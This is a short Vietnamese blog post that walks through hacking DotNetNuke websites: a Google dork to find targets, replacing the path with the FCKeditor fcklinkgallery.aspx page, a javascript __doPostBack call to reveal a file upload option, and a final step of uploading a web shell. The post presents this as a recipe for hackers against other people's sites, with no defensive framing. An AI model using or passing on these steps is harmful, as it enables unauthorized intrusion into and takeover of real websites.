Phương pháp này cũng sủ dụng Google để tìm kiếm các website thông qua Dork
Như vậy bạn cũng hiểu rằng Google rất là lợi hại và hữu dụng với chúng ta,nhất là các hacker
Step 1 : go http://google.com
Step 2 : Dork: inurl:/tabid/36/language/en-US/Default.aspx
Step 3 : Google sẽ trình xuất cho bạn rất nhiều --> Khoảng 11.600 kết quả (0,09 giây) như vậy chắc đủ cho bạn "múa tay"
Step 4 : Ví dụ
http://xxx.com/Home/tabid/36/language/en-US/Default.aspx
Step 5 : Thay thế
/Home/tabid/36/Language/en-US/Default.aspxbằng
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Step 6 : Bây giờ bạn nhận được 1 page như trên, nhưng đừng làm bất cứ điều gì hết, như vậy là sao, là vì ta sẽ tiếp tục chứ sao
Step 7 : Thay đổi URL trong mục bằng 1 đoạn java script đơn giản
javascript:__doPostBack('ctlURL$cmdUpload','')
Step 8 : Bạn sẽ tìm thấy option upload
Step 9 : Công việc cuối cùng của bạn là up shell lên .....
Bài viết này tôi dịch theo sự suy nghĩ của mình + với google.
Không có nhận xét nào:
Đăng nhận xét